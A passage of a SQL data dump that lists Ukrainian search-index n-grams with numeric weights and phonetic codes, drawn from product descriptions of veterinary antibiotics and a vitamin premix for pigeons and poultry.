дії','спектру дії',0,1,1.3667,'с000',1,'*'),(1536362,'спектру дії ефективний','спектру дії ефективний',0,1,1.7333,'с000',1,'*'),(1536363,'специфічним','специфічним',0,0,0.7333,'с000',2,'*'),(1536364,'специфічним запахом','специфічним запахом',0,1,1.6333,'с000',2,'*'),(1536365,'специфічним запахом склад','специфічним запахом склад',0,1,1.8333,'с000',1,'*'),(1536366,'способом','способом',0,0,0.5333,'с000',3,'*'),(1536367,'способом у','способом у',0,1,1.3333,'с000',1,'*'),(1536368,'способом у дозі','способом у дозі',0,1,1.5,'с000',1,'*'),(1536369,'сухе','сухе',0,0,0.2667,'с000',5,'*'),(1536370,'сухе темне','сухе темне',0,1,1.3333,'с000',4,'*'),(1536371,'сухе темне недоступне','сухе темне недоступне',0,1,1.7,'с000',4,'*'),(1536372,'тіамулін','тіамулін',0,0,0.5333,'т000',1,'*'),(1536373,'тіамулін гідроген','тіамулін гідроген',0,1,1.5667,'т000',1,'*'),(1536374,'тіамулін гідроген фумарат','тіамулін гідроген фумарат',0,1,1.8333,'т000',1,'*'),(1536375,'тіамулін діє','тіамулін діє',0,1,1.4,'т000',1,'*'),(1536376,'тіамулін діє бактеріостатично','тіамулін діє бактеріостатично',0,1,1.9667,'т000',1,'*'),(1536377,'тіамуліну','тіамуліну',0,0,0.6,'т000',1,'*'),(1536378,'тіамуліну дозування','тіамуліну дозування',0,1,1.6333,'т000',1,'*'),(1536379,'тіамуліну дозування препарат','тіамуліну дозування препарат',0,1,1.9333,'т000',1,'*'),(1536380,'тіамуліну форма','тіамуліну форма',0,1,1.5,'т000',1,'*'),(1536381,'тіамуліну форма випуску','тіамуліну форма випуску',0,1,1.7667,'т000',1,'*'),(1536382,'тімокс','тімокс',0,0,0.4,'т000',1,'*'),(1536383,'тімокс комплексний','тімокс комплексний',0,1,1.6,'т000',1,'*'),(1536384,'тімокс комплексний препарат','тімокс комплексний препарат',0,1,1.9,'т000',1,'*'),(1536385,'та амеби','та амеби',0,1,1.2667,'т000',1,'*'),(1536386,'та амеби застосування','та амеби застосування',0,1,1.7,'т000',1,'*'),(1536387,'та грам-негативних','та грам-негативних',0,1,1.6,'т000',1,'*'),(1536388,'та грам-негативних бактерій','та грам-негативних бактерій',0,1,1.9,'т000',1,'*'),(1536389,'та декоративних','та декоративних',0,1,1.5,'т000',2,'*'),(1536390,'та декоративних птахів','та декоративних птахів',0,1,1.7333,'т000',2,'*'),(1536391,'та лікування','та лікування',0,1,1.4,'т000',2,'*'),(1536392,'та лікування у','та лікування у',0,1,1.4667,'т000',1,'*'),(1536393,'та первинних','та первинних',0,1,1.4,'т000',1,'*'),(1536394,'та первинних і','та первинних і',0,1,1.4667,'т000',1,'*'),(1536395,'та продукцію','та продукцію',0,1,1.4,'т000',1,'*'),(1536396,'та продукцію тварин','та продукцію тварин',0,1,1.6333,'т000',1,'*'),(1536397,'та птиці','та птиці',0,1,1.2667,'т000',1,'*'),(1536398,'та птиці призначених','та птиці призначених',0,1,1.6667,'т000',1,'*'),(1536399,'та рикетсій','та рикетсій',0,1,1.3667,'т000',1,'*'),(1536400,'та рикетсій rickettsia','та рикетсій rickettsia',0,1,1.7333,'т6232',1,'*'),(1536401,'та тіамуліну','та тіамуліну',0,1,1.4,'т000',1,'*'),(1536402,'та тіамуліну дозування','та тіамуліну дозування',0,1,1.7333,'т000',1,'*'),(1536403,'та тіамуліну форма','та тіамуліну форма',0,1,1.6,'т000',1,'*'),(1536404,'також','також',0,0,0.3333,'т000',6,'*'),(1536405,'також деяких','також деяких',0,1,1.4,'т000',1,'*'),(1536406,'також деяких анаеробів','також деяких анаеробів',0,1,1.7333,'т000',1,'*'),(1536407,'також на','також на',0,1,1.2667,'т000',1,'*'),(1536408,'також на actinobacillus','також на actinobacillus',0,1,1.7667,'т2351242',1,'*'),(1536409,'тварин','тварин',0,0,0.4,'т000',3,'*'),(1536410,'тварин та','тварин та',0,1,1.3,'т000',1,'*'),(1536411,'тварин та птиці','тварин та птиці',0,1,1.5,'т000',1,'*'),(1536412,'тваринам','тваринам',0,0,0.5333,'т000',2,'*'),(1536413,'тваринам не','тваринам не',0,1,1.3667,'т000',1,'*'),(1536414,'тваринам не застосовувати','тваринам не застосовувати',0,1,1.8333,'т000',1,'*'),(1536415,'темне','темне',0,0,0.3333,'т000',4,'*'),(1536416,'темне недоступне','темне недоступне',0,1,1.5333,'т000',4,'*'),(1536417,'темне недоступне для','темне недоступне для',0,1,1.6667,'т000',4,'*'),(1536418,'температури','температури',0,0,0.7333,'т000',3,'*'),(1536419,'температури від','температури від',0,1,1.5,'т000',3,'*'),(1536420,'температури від 5','температури від 5',0,1,1.5667,'т000',3,'*'),(1536421,'термін придатності 2','термін придатності 2',0,1,1.6667,'т000',3,'*'),(1536422,'тріхомонозу','тріхомонозу',0,0,0.7333,'т000',1,'*'),(1536423,'тріхомонозу та','тріхомонозу та',0,1,1.4667,'т000',1,'*'),(1536424,'тріхомонозу та первинних','тріхомонозу та первинних',0,1,1.8,'т000',1,'*'),(1536425,'у голубів','у голубів',0,1,1.3,'у000',2,'*'),(1536426,'у голубів та','у голубів та',0,1,1.4,'у000',1,'*'),(1536427,'у дозі','у дозі',0,1,1.2,'у000',1,'*'),(1536428,'у дозі 1-2','у дозі 1-2',0,1,1.3333,'у000',1,'*'),(1536429,'усуміші','усуміші',0,0,0.4667,'у000',1,'*'),(1536430,'усуміші з','усуміші з',0,1,1.3,'у000',1,'*'),(1536431,'усуміші з водою','усуміші з водою',0,1,1.5,'у000',1,'*'),(1536432,'фармакологiчнi','фармакологiчнi',0,0,0.9333,'ф000',2,'*'),(1536433,'фармакологiчнi властивостi','фармакологiчнi властивостi',0,1,1.8667,'ф000',2,'*'),(1536434,'фармакологiчнi властивостi окситетрациклін','фармакологiчнi властивостi окситетрациклін',0,1,2,'ф000',1,'*'),(1536435,'фольговані','фольговані',0,0,0.6667,'ф000',2,'*'),(1536436,'фольговані пакети','фольговані пакети',0,1,1.5667,'ф000',2,'*'),(1536437,'фольговані пакети по','фольговані пакети по',0,1,1.6667,'ф000',2,'*'),(1536438,'форма випуску фольговані','форма випуску фольговані',0,1,1.8,'ф000',2,'*'),(1536439,'фумарат','фумарат',0,0,0.4667,'ф000',1,'*'),(1536440,'фумарат 50','фумарат 50',0,1,1.3333,'ф000',1,'*'),(1536441,'фумарат 50 мг','фумарат 50 мг',0,1,1.4333,'ф000',1,'*'),(1536442,'хламідій','хламідій',0,0,0.5333,'х000',1,'*'),(1536443,'хламідій chlamidia','хламідій chlamidia',0,1,1.6,'х2453',1,'*'),(1536444,'хламідій chlamidia spp','хламідій chlamidia spp',0,1,1.7333,'х245321',1,'*'),(1536445,'хламідій chlamydia','хламідій chlamydia',0,1,1.6,'х2453',1,'*'),(1536446,'хламідій chlamydia spp','хламідій chlamydia spp',0,1,1.7333,'х245321',1,'*'),(1536447,'чутливість','чутливість',0,0,0.6667,'ч000',2,'*'),(1536448,'чутливість до','чутливість до',0,1,1.4333,'ч000',2,'*'),(1536449,'чутливість до окситетрацикліну','чутливість до окситетрацикліну',0,1,2,'ч000',1,'*'),(1536450,'чутливими','чутливими',0,0,0.6,'ч000',2,'*'),(1536451,'чутливими до','чутливими до',0,1,1.4,'ч000',2,'*'),(1536452,'чутливими до дії','чутливими до дії',0,1,1.5333,'ч000',1,'*'),(1536453,'широкого','широкого',0,0,0.5333,'ш000',1,'*'),(1536454,'широкого спектру','широкого спектру',0,1,1.5333,'ш000',1,'*'),(1536455,'широкого спектру дії','широкого спектру дії',0,1,1.6667,'ш000',1,'*'),(1536456,'щоденно','щоденно',0,0,0.4667,'щ000',1,'*'),(1536457,'щоденно протягом','щоденно протягом',0,1,1.5333,'щ000',1,'*'),(1536458,'щоденно протягом 5-6','щоденно протягом 5-6',0,1,1.6667,'щ000',1,'*'),(1536459,'щодо','щодо',0,0,0.2667,'щ000',4,'*'),(1536460,'щодо мікоплазм','щодо мікоплазм',0,1,1.4667,'щ000',1,'*'),(1536461,'щодо мікоплазм mycoplasma','щодо мікоплазм mycoplasma',0,1,1.8333,'щ521425',1,'*'),(1536462,'ясо','ясо',0,0,0.2,'я000',1,'*'),(1536463,'ясо та','ясо та',0,1,1.2,'я000',1,'*'),(1536464,'ясо та продукцію','ясо та продукцію',0,1,1.5333,'я000',1,'*'),(1540007,'0','0',0,0,0.1,'',3,'*'),(1540008,'0 с','0 с',0,1,1.1,'с000',1,'*'),(1540009,'0 с до','0 с до',0,1,1.2,'с000',1,'*'),(1540010,'0,2','0,2',0,0,0.3,'',1,'*'),(1540011,'0,2 мг','0,2 мг',0,1,1.2,'м000',1,'*'),(1540012,'0,2 мг кальпан','0,2 мг кальпан',0,1,1.4667,'м000',1,'*'),(1540013,'0,35','0,35',0,0,0.4,'',1,'*'),(1540014,'0,35 властивостi','0,35 властивостi',0,1,1.5333,'в000',1,'*'),(1540015,'0,35 властивостi комплекс','0,35 властивостi комплекс',0,1,1.8333,'в000',1,'*'),(1540016,'000','000',0,0,0.3,'',2,'*'),(1540017,'000 од','000 од',0,1,1.2,'о000',2,'*'),(1540018,'000 од вітамін','000 од вітамін',0,1,1.4667,'о000',2,'*'),(1540019,'1 варіант','1 варіант',0,1,1.3,'в000',1,'*'),(1540020,'1 варіант засипати','1 варіант засипати',0,1,1.6,'в000',1,'*'),(1540021,'1 кг','1 кг',0,1,1.1333,'к000',3,'*'),(1540022,'1 кг зерносуміші','1 кг зерносуміші',0,1,1.5333,'к000',1,'*'),(1540023,'1 кг преміксу','1 кг преміксу',0,1,1.4333,'к000',1,'*'),(1540024,'100 мг','100 мг',0,1,1.2,'м000',1,'*'),(1540025,'100 мг вітамін','100 мг вітамін',0,1,1.4667,'м000',1,'*'),(1540026,'100 мг залізо','100 мг залізо',0,1,1.4333,'м000',1,'*'),(1540027,'1000','1000',0,0,0.4,'',2,'*'),(1540028,'1000 г','1000 г',0,1,1.2,'г000',2,'*'),(1540029,'1000 г термін','1000 г термін',0,1,1.4333,'г000',1,'*'),(1540030,'12 місяців','12 місяців',0,1,1.3333,'м000',3,'*'),(1540031,'12 місяців з','12 місяців з',0,1,1.4,'м000',2,'*'),(1540032,'1200','1200',0,0,0.4,'',1,'*'),(1540033,'1200 мг','1200 мг',0,1,1.2333,'м000',1,'*'),(1540034,'1200 мг кобальт','1200 мг кобальт',0,1,1.5,'м000',1,'*'),(1540035,'1200 мг цинк','1200 мг цинк',0,1,1.4,'м000',1,'*'),(1540036,'2 варіант','2 варіант',0,1,1.3,'в000',1,'*'),(1540037,'2 варіант задавати','2 варіант задавати',0,1,1.6,'в000',1,'*'),(1540038,'2 рази','2 рази',0,1,1.2,'р000',1,'*'),(1540039,'2 рази на','2 рази на',0,1,1.3,'р000',1,'*'),(1540040,'2 ст','2 ст',0,1,1.1333,'с000',1,'*'),(1540041,'2 ст ложки','2 ст ложки',0,1,1.3333,'с000',1,'*'),(1540042,'20 000','20 000',0,1,1.2,'',2,'*'),(1540043,'20 000 од','20 000 од',0,1,1.3,'о000',1,'*'),(1540044,'200 000','200 000',0,1,1.2333,'',1,'*'),(1540045,'200 000 од','200 000 од',0,1,1.3333,'о000',1,'*'),(1540046,'200 1000','200 1000',0,1,1.2667,'',1,'*'),(1540047,'200 1000 г','200 1000 г',0,1,1.3333,'г000',1,'*'),(1540048,'200 мг','200 мг',0,1,1.2,'м000',1,'*'),(1540049,'200 мг вітамін','200 мг вітамін',0,1,1.4667,'м000',1,'*'),(1540050,'2000','2000',0,0,0.4,'',2,'*'),(1540051,'2000 мг','2000 мг',0,1,1.2333,'м000',2,'*'),(1540052,'2000 мг фолієва','2000 мг фолієва',0,1,1.5,'м000',1,'*'),(1540053,'2457','2457',0,0,0.4,'',1,'*'),(1540054,'25 мг','25 мг',0,1,1.1667,'м000',1,'*'),(1540055,'25 мг марганець','25 мг марганець',0,1,1.5,'м000',1,'*'),(1540056,'3 рази','3 рази',0,1,1.2,'р000',1,'*'),(1540057,'3 рази на','3 рази на',0,1,1.3,'р000',1,'*'),(1540058,'30','30',0,0,0.2,'',6,'*'),(1540059,'30 г','30 г',0,1,1.1333,'г000',2,'*'),(1540060,'30 г 2','30 г 2',0,1,1.2,'г000',1,'*'),(1540061,'30 с','30 с',0,1,1.1333,'с000',1,'*'),(1540062,'30 с форма','30 с форма',0,1,1.3333,'с000',1,'*'),(1540063,'32,00','32,00',0,0,0.5,'',1,'*'),(1540064,'32,00 фосфор','32,00 фосфор',0,1,1.4,'ф000',1,'*'),(1540065,'32,00 фосфор 0,35','32,00 фосфор 0,35',0,1,1.5667,'ф000',1,'*'),(1540066,'4','4',0,0,0.1,'',9,'*'),(1540067,'4 мг','4 мг',0,1,1.1333,'м000',1,'*'),(1540068,'4 мг сірка','4 мг сірка',0,1,1.3333,'м000',1,'*'),(1540069,'40','40',0,0,0.2,'',2,'*'),(1540070,'40 мг','40 мг',0,1,1.1667,'м000',1,'*'),(1540071,'40 мг біотин','40 мг біотин',0,1,1.4,'м000',1,'*'),(1540072,'40 мг кальцій','40 мг кальцій',0,1,1.4333,'м000',1,'*'),(1540073,'4000','4000',0,0,0.4,'',2,'*'),(1540074,'4000 мг','4000 мг',0,1,1.2333,'м000',2,'*'),(1540075,'4000 мг йод','4000 мг йод',0,1,1.3667,'м000',1,'*'),(1540076,'50 мг вітамін','50 мг вітамін',0,1,1.4333,'м000',1,'*'),(1540077,'500','500',0,0,0.3,'',3,'*'),(1540078,'500 мг','500 мг',0,1,1.2,'м000',2,'*'),(1540079,'500 мг бетафін','500 мг бетафін',0,1,1.4667,'м000',1,'*'),(1540080,'520','520',0,0,0.3,'',1,'*'),(1540081,'520 мг','520 мг',0,1,1.2,'м000',1,'*'),(1540082,'520 мг нікотинова','520 мг нікотинова',0,1,1.5667,'м000',1,'*'),(1540083,'80','80',0,0,0.2,'',1,'*'),(1540084,'80 мг','80 мг',0,1,1.1667,'м000',1,'*'),(1540085,'80 мг вітамін','80 мг вітамін',0,1,1.4333,'м000',1,'*'),(1540086,'800','800',0,0,0.3,'',1,'*'),(1540087,'800 мг','800 мг',0,1,1.2,'м000',1,'*'),(1540088,'800 мг мідь','800 мг мідь',0,1,1.3667,'м000',1,'*'),(1540089,'90','90',0,0,0.2,'',1,'*'),(1540090,'90 мг','90 мг',0,1,1.1667,'м000',1,'*'),(1540091,'90 мг вітамін','90 мг вітамін',0,1,1.4333,'м000',1,'*'),(1540092,'biomiks','biomiks',0,0,0.4667,'B520',1,'*'),(1540093,'biomiks premiks','biomiks premiks',0,1,1.5,'B521652',1,'*'),(1540094,'biomiks premiks dlya','biomiks premiks dlya',0,1,1.6667,'B52165234',1,'*'),(1540095,'dlya','dlya',0,0,0.2667,'D400',4,'*'),(1540096,'dlya golubiv','dlya golubiv',0,1,1.4,'D4241',3,'*'),(1540097,'dlya golubiv vitaminnij','dlya golubiv vitaminnij',0,1,1.7667,'D4241352',1,'*'),(1540098,'golubiv','golubiv',0,0,0.4667,'G410',5,'*'),(1540099,'golubiv vitaminnij','golubiv vitaminnij',0,1,1.6,'G41352',1,'*'),(1540100,'premiks','premiks',0,0,0.4667,'P652',1,'*'),(1540101,'premiks dlya','premiks dlya',0,1,1.4,'P65234',1,'*'),(1540102,'premiks dlya golubiv','premiks dlya golubiv',0,1,1.6667,'P65234241',1,'*'),(1540103,'vitaminnij','vitaminnij',0,0,0.6667,'V352',2,'*'),(1540104,'ємність','ємність',0,0,0.4667,'є000',1,'*'),(1540105,'ємність годівницю','ємність годівницю',0,1,1.5667,'є000',1,'*'),(1540106,'ємність годівницю для','ємність годівницю для',0,1,1.7,'є000',1,'*'),(1540107,'і линьки','і линьки',0,1,1.2667,'і000',1,'*'),(1540108,'і линьки збагачену','і линьки збагачену',0,1,1.6,'і000',1,'*'),(1540109,'і розвитку','і розвитку',0,1,1.3333,'і000',1,'*'),(1540110,'і розвитку птахів','і розвитку птахів',0,1,1.5667,'і000',1,'*'),(1540111,'ігрових','ігрових',0,0,0.4667,'і000',1,'*'),(1540112,'ігрових короткодзьобих','ігрових короткодзьобих',0,1,1.7333,'і000',1,'*'),(1540113,'ігрових короткодзьобих високольотних','ігрових короткодзьобих високольотних',0,1,2,'і000',1,'*'),(1540114,'інших','інших',0,0,0.3333,'і000',3,'*'),(1540115,'інших порід','інших порід',0,1,1.3667,'і000',1,'*'),(1540116,'інших порід голубів','інших порід голубів',0,1,1.6333,'і000',1,'*'),(1540117,'а 200','а 200',0,1,1.1667,'а000',1,'*'),(1540118,'а 200 000','а 200 000',0,1,1.3,'а000',1,'*'),(1540119,'а в','а в',0,1,1.1,'а000',1,'*'),(1540120,'а в період','а в період',0,1,1.3333,'а000',1,'*'),(1540121,'біомікс','біомікс',0,0,0.4667,'б000',1,'*'),(1540122,'біомікс премікс','біомікс премікс',0,1,1.5,'б000',1,'*'),(1540123,'біомікс премікс для','біомікс премікс для',0,1,1.6333,'б000',1,'*'),(1540124,'біотин','біотин',0,0,0.4,'б000',1,'*'),(1540125,'біотин 4','біотин 4',0,1,1.2667,'б000',1,'*'),(1540126,'біотин 4 мг','біотин 4 мг',0,1,1.3667,'б000',1,'*'),(1540127,'без','без',0,0,0.2,'б000',5,'*'),(1540128,'без ознак','без ознак',0,1,1.3,'б000',1,'*'),(1540129,'без ознак та','без ознак та',0,1,1.4,'б000',1,'*'),(1540130,'бетафін','бетафін',0,0,0.4667,'б000',1,'*'),(1540131,'бетафін 2000','бетафін 2000',0,1,1.4,'б000',1,'*'),(1540132,'бетафін 2000 мг','бетафін 2000 мг',0,1,1.5,'б000',1,'*'),(1540133,'бренд','бренд',0,0,0.3333,'б000',1,'*'),(1540134,'бренд ппф','бренд ппф',0,1,1.3,'б000',1,'*'),(1540135,'бренд ппф фарматон','бренд ппф фарматон',0,1,1.6,'б000',1,'*'),(1540136,'в невелику','в невелику',0,1,1.3333,'в000',1,'*'),(1540137,'в невелику ємність','в невелику ємність',0,1,1.6,'в000',1,'*'),(1540138,'в період','в період',0,1,1.2667,'в000',1,'*'),(1540139,'в період змагань','в період змагань',0,1,1.5333,'в000',1,'*'),(1540140,'в сухому','в сухому',0,1,1.2667,'в000',2,'*'),(1540141,'в сухому місці','в сухому місці',0,1,1.4667,'в000',1,'*'),(1540142,'в сухому стані','в сухому стані',0,1,1.4667,'в000',1,'*'),(1540143,'в1','в1',0,0,0.1333,'в000',2,'*'),(1540144,'в1 90','в1 90',0,1,1.1667,'в000',1,'*'),(1540145,'в1 90 мг','в1 90 мг',0,1,1.2667,'в000',1,'*'),(1540146,'в12','в12',0,0,0.2,'в000',2,'*'),(1540147,'в12 0,2','в12 0,2',0,1,1.2333,'в000',1,'*'),(1540148,'в12 0,2 мг','в12 0,2 мг',0,1,1.3333,'в000',1,'*'),(1540149,'в2','в2',0,0,0.1333,'в000',2,'*'),(1540150,'в2 80','в2 80',0,1,1.1667,'в000',1,'*'),(1540151,'в2 80 мг','в2 80 мг',0,1,1.2667,'в000',1,'*'),(1540152,'в6','в6',0,0,0.1333,'в000',2,'*'),(1540153,'в6 50','в6 50',0,1,1.1667,'в000',1,'*'),(1540154,'в6 50 мг','в6 50 мг',0,1,1.2667,'в000',1,'*'),(1540155,'від 0','від 0',0,1,1.1667,'в000',1,'*'),(1540156,'від 0 с','від 0 с',0,1,1.2333,'в000',1,'*'),(1540157,'вільного','вільного',0,0,0.5333,'в000',1,'*'),(1540158,'вільного доступу','вільного доступу',0,1,1.5333,'в000',1,'*'),(1540159,'вільного доступу голубів','вільного доступу голубів',0,1,1.8,'в000',1,'*'),(1540160,'вітамін','вітамін',0,0,0.4667,'в000',2,'*'),(1540161,'вітамін а','вітамін а',0,1,1.3,'в000',2,'*'),(1540162,'вітамін а 200','вітамін а 200',0,1,1.4333,'в000',1,'*'),(1540163,'вітамін в1','вітамін в1',0,1,1.3333,'в000',2,'*'),(1540164,'вітамін в1 90','вітамін в1 90',0,1,1.4333,'в000',1,'*'),(1540165,'вітамін в12','вітамін в12',0,1,1.3667,'в000',2,'*'),(1540166,'вітамін в12 0,2','вітамін в12 0,2',0,1,1.5,'в000',1,'*'),(1540167,'вітамін в2','вітамін в2',0,1,1.3333,'в000',2,'*'),(1540168,'вітамін в2 80','вітамін в2 80',0,1,1.4333,'в000',1,'*'),(1540169,'вітамін в6','вітамін в6',0,1,1.3333,'в000',2,'*'),(1540170,'вітамін в6 50','вітамін в6 50',0,1,1.4333,'в000',1,'*'),(1540171,'вітамін д3','вітамін д3',0,1,1.3333,'в000',2,'*'),(1540172,'вітамін д3 20','вітамін д3 20',0,1,1.4333,'в000',1,'*'),(1540173,'вітамін е','вітамін е',0,1,1.3,'в000',2,'*'),(1540174,'вітамін е 100','вітамін е 100',0,1,1.4333,'в000',1,'*'),(1540175,'вітамін к3','вітамін к3',0,1,1.3333,'в000',2,'*'),(1540176,'вітамін к3 50','вітамін к3 50',0,1,1.4333,'в000',1,'*'),(1540177,'вітамін с','вітамін с',0,1,1.3,'в000',2,'*'),(1540178,'вітамін с 500','вітамін с 500',0,1,1.4333,'в000',1,'*'),(1540179,'вітамінів','вітамінів',0,0,0.6,'в000',2,'*'),(1540180,'вітамінів мікро','вітамінів мікро',0,1,1.5,'в000',1,'*'),(1540181,'вітамінів мікро та','вітамінів мікро та',0,1,1.6,'в000',1,'*'),(1540182,'вітамінний','вітамінний',0,0,0.6667,'в000',2,'*'),(1540183,'варіант','варіант',0,0,0.4667,'в000',3,'*'),(1540184,'варіант задавати','варіант задавати',0,1,1.5333,'в000',1,'*'),(1540185,'варіант задавати 30','варіант задавати 30',0,1,1.6333,'в000',1,'*'),(1540186,'варіант засипати','варіант засипати',0,1,1.5333,'в000',1,'*'),(1540187,'варіант засипати в','варіант засипати в',0,1,1.6,'в000',1,'*'),(1540188,'виготовлення','виготовлення',0,0,0.8,'в000',2,'*'),(1540189,'виготовлення для','виготовлення для',0,1,1.5333,'в000',1,'*'),(1540190,'виготовлення для застосування','виготовлення для застосування',0,1,1.9667,'в000',1,'*'),(1540191,'випуску пакети','випуску пакети',0,1,1.4667,'в000',2,'*'),(1540192,'випуску пакети з','випуску пакети з',0,1,1.5333,'в000',1,'*'),(1540193,'випуску порошок','випуску порошок',0,1,1.5,'в000',1,'*'),(1540194,'випуску порошок опис','випуску порошок опис',0,1,1.6667,'в000',1,'*'),(1540195,'виробник продукту','виробник продукту',0,1,1.5667,'в000',1,'*'),(1540196,'виробник продукту пп','виробник продукту пп',0,1,1.6667,'в000',1,'*'),(1540197,'високольотних','високольотних',0,0,0.8667,'в000',1,'*'),(1540198,'високольотних та','високольотних та',0,1,1.5333,'в000',1,'*'),(1540199,'високольотних та інших','високольотних та інших',0,1,1.7333,'в000',1,'*'),(1540200,'властивостi комплекс','властивостi комплекс',0,1,1.6667,'в000',1,'*'),(1540201,'властивостi комплекс життєво','властивостi комплекс життєво',0,1,1.9333,'в000',1,'*'),(1540202,'всіма','всіма',0,0,0.3333,'в000',1,'*'),(1540203,'всіма найважливішими','всіма найважливішими',0,1,1.6667,'в000',1,'*'),(1540204,'всіма найважливішими показниками','всіма найважливішими показниками',0,1,2,'в000',1,'*'),(1540205,'г 2','г 2',0,1,1.1,'г000',2,'*'),(1540206,'г 2 ст','г 2 ст',0,1,1.2,'г000',1,'*'),(1540207,'г термін','г термін',0,1,1.2667,'г000',1,'*'),(1540208,'г термін придатності','г термін придатності',0,1,1.6667,'г000',1,'*'),(1540209,'годівницю','годівницю',0,0,0.6,'г000',1,'*'),(1540210,'годівницю для','годівницю для',0,1,1.4333,'г000',1,'*'),(1540211,'годівницю для вільного','годівницю для вільного',0,1,1.7333,'г000',1,'*'),(1540212,'голубів вітамінний','голубів вітамінний',0,1,1.6,'г000',1,'*'),(1540213,'голубів дозування','голубів дозування',0,1,1.5667,'г000',2,'*'),(1540214,'голубів дозування 1','голубів дозування 1',0,1,1.6333,'г000',1,'*'),(1540215,'голубів протягом','голубів протягом',0,1,1.5333,'г000',2,'*'),(1540216,'голубів протягом року','голубів протягом року',0,1,1.7,'г000',1,'*'),(1540217,'голубів формуванню','голубів формуванню',0,1,1.6,'г000',1,'*'),(1540218,'голубів формуванню кісткової','голубів формуванню кісткової',0,1,1.9333,'г000',1,'*'),(1540219,'д3','д3',0,0,0.1333,'д000',2,'*'),(1540220,'д3 20','д3 20',0,1,1.1667,'д000',1,'*'),(1540221,'д3 20 000','д3 20 000',0,1,1.3,'д000',1,'*'),(1540222,'для вільного','для вільного',0,1,1.4,'д000',1,'*'),(1540223,'для вільного доступу','для вільного доступу',0,1,1.6667,'д000',1,'*'),(1540224,'для голубів','для голубів',0,1,1.3667,'д000',3,'*'),(1540225,'для голубів вітамінний','для голубів вітамінний',0,1,1.7333,'д000',1,'*'),(1540226,'для оштово-спортивних','для оштово-спортивних',0,1,1.7,'д000',1,'*'),(1540227,'для оштово-спортивних статних','для оштово-спортивних статних',0,1,1.9667,'д000',1,'*'),(1540228,'дня','дня',0,0,0.2,'д000',4,'*'),(1540229,'дня виготовлення','дня виготовлення',0,1,1.5333,'д000',2,'*'),(1540230,'дня виготовлення для','дня виготовлення для',0,1,1.6667,'д000',1,'*'),(1540231,'до 30','до 30',0,1,1.1667,'д000',2,'*'),(1540232,'до 30 с','до 30 с',0,1,1.2333,'д000',1,'*'),(1540233,'до хвороб','до хвороб',0,1,1.3,'д000',1,'*'),(1540234,'до хвороб кращому','до хвороб кращому',0,1,1.5667,'д000',1,'*'),(1540235,'дозування 1','дозування 1',0,1,1.3667,'д000',1,'*'),(1540236,'дозування 1 варіант','дозування 1 варіант',0,1,1.6333,'д000',1,'*'),(1540237,'доступу','доступу',0,0,0.4667,'д000',1,'*'),(1540238,'доступу голубів','доступу голубів',0,1,1.5,'д000',1,'*'),(1540239,'доступу голубів протягом','доступу голубів протягом',0,1,1.8,'д000',1,'*'),(1540240,'е','е',0,0,0.0667,'е000',2,'*'),(1540241,'е 100','е 100',0,1,1.1667,'е000',1,'*'),(1540242,'е 100 мг','е 100 мг',0,1,1.2667,'е000',1,'*'),(1540243,'життєво','життєво',0,0,0.4667,'ж000',1,'*'),(1540244,'життєво необхідних','життєво необхідних',0,1,1.6,'ж000',1,'*'),(1540245,'життєво необхідних вітамінів','життєво необхідних вітамінів',0,1,1.9333,'ж000',1,'*'),(1540246,'життєздатності','життєздатності',0,0,0.9333,'ж000',1,'*'),(1540247,'життєздатності молодняка','життєздатності молодняка',0,1,1.8,'ж000',1,'*'),(1540248,'життєздатності молодняка голубів','життєздатності молодняка голубів',0,1,2,'ж000',1,'*'),(1540249,'з дня','з дня',0,1,1.1667,'з000',2,'*'),(1540250,'з дня виготовлення','з дня виготовлення',0,1,1.6,'з000',2,'*'),(1540251,'з ламінованого','з ламінованого',0,1,1.4667,'з000',1,'*'),(1540252,'з ламінованого паперу','з ламінованого паперу',0,1,1.7,'з000',1,'*'),(1540253,'за всіма','за всіма',0,1,1.2667,'з000',1,'*'),(1540254,'за всіма найважливішими','за всіма найважливішими',0,1,1.7667,'з000',1,'*'),(1540255,'задавати','задавати',0,0,0.5333,'з000',1,'*'),(1540256,'задавати 3','задавати 3',0,1,1.3333,'з000',1,'*'),(1540257,'задавати 3 рази','задавати 3 рази',0,1,1.5,'з000',1,'*'),(1540258,'задавати 30','задавати 30',0,1,1.3667,'з000',1,'*'),(1540259,'задавати 30 г','задавати 30 г',0,1,1.4333,'з000',1,'*'),(1540260,'залізо','залізо',0,0,0.4,'з000',1,'*'),(1540261,'залізо 4000','залізо 4000',0,1,1.3667,'з000',1,'*'),(1540262,'залізо 4000 мг','залізо 4000 мг',0,1,1.4667,'з000',1,'*'),(1540263,'запас','запас',0,0,0.3333,'з000',1,'*'),(1540264,'запас преміксу','запас преміксу',0,1,1.4667,'з000',1,'*'),(1540265,'запас преміксу та','запас преміксу та',0,1,1.5667,'з000',1,'*'),(1540266,'запаху','запаху',0,0,0.4,'з000',1,'*'),(1540267,'запаху плісняви','запаху плісняви',0,1,1.5,'з000',1,'*'),(1540268,'запаху плісняви склад','запаху плісняви склад',0,1,1.7,'з000',1,'*'),(1540269,'засвоєнню','засвоєнню',0,0,0.6,'з000',1,'*'),(1540270,'засвоєнню поживних','засвоєнню поживних',0,1,1.6,'з000',1,'*'),(1540271,'засвоєнню поживних речовин','засвоєнню поживних речовин',0,1,1.8667,'з000',1,'*'),(1540272,'засипати','засипати',0,0,0.5333,'з000',1,'*'),(1540273,'засипати в','засипати в',0,1,1.3333,'з000',1,'*'),(1540274,'засипати в невелику','засипати в невелику',0,1,1.6333,'з000',1,'*'),(1540275,'застосовувати для','застосовувати для',0,1,1.5667,'з000',1,'*'),(1540276,'застосовувати для оштово-спортивних','застосовувати для оштово-спортивних',0,1,2,'з000',1,'*'),(1540277,'застосування рекомендовано','застосування рекомендовано',0,1,1.8667,'з000',1,'*'),(1540278,'застосування рекомендовано застосовувати','застосування рекомендовано застосовувати',0,1,2,'з000',1,'*'),(1540279,'збагачену','збагачену',0,0,0.6,'з000',1,'*'),(1540280,'збагачену зерносуміш','збагачену зерносуміш',0,1,1.6667,'з000',1,'*'),(1540281,'збагачену зерносуміш задавати','збагачену зерносуміш задавати',0,1,1.9667,'з000',1,'*'),(1540282,'зберiгання','зберiгання',0,0,0.6667,'з000',3,'*'),(1540283,'зберiгання в','зберiгання в',0,1,1.4,'з000',2,'*'),(1540284,'зберiгання в сухому','зберiгання в сухому',0,1,1.6333,'з000',2,'*'),(1540285,'зерносуміш','зерносуміш',0,0,0.6667,'з000',1,'*'),(1540286,'зерносуміш задавати','зерносуміш задавати',0,1,1.6333,'з000',1,'*'),(1540287,'зерносуміш задавати 3','зерносуміш задавати 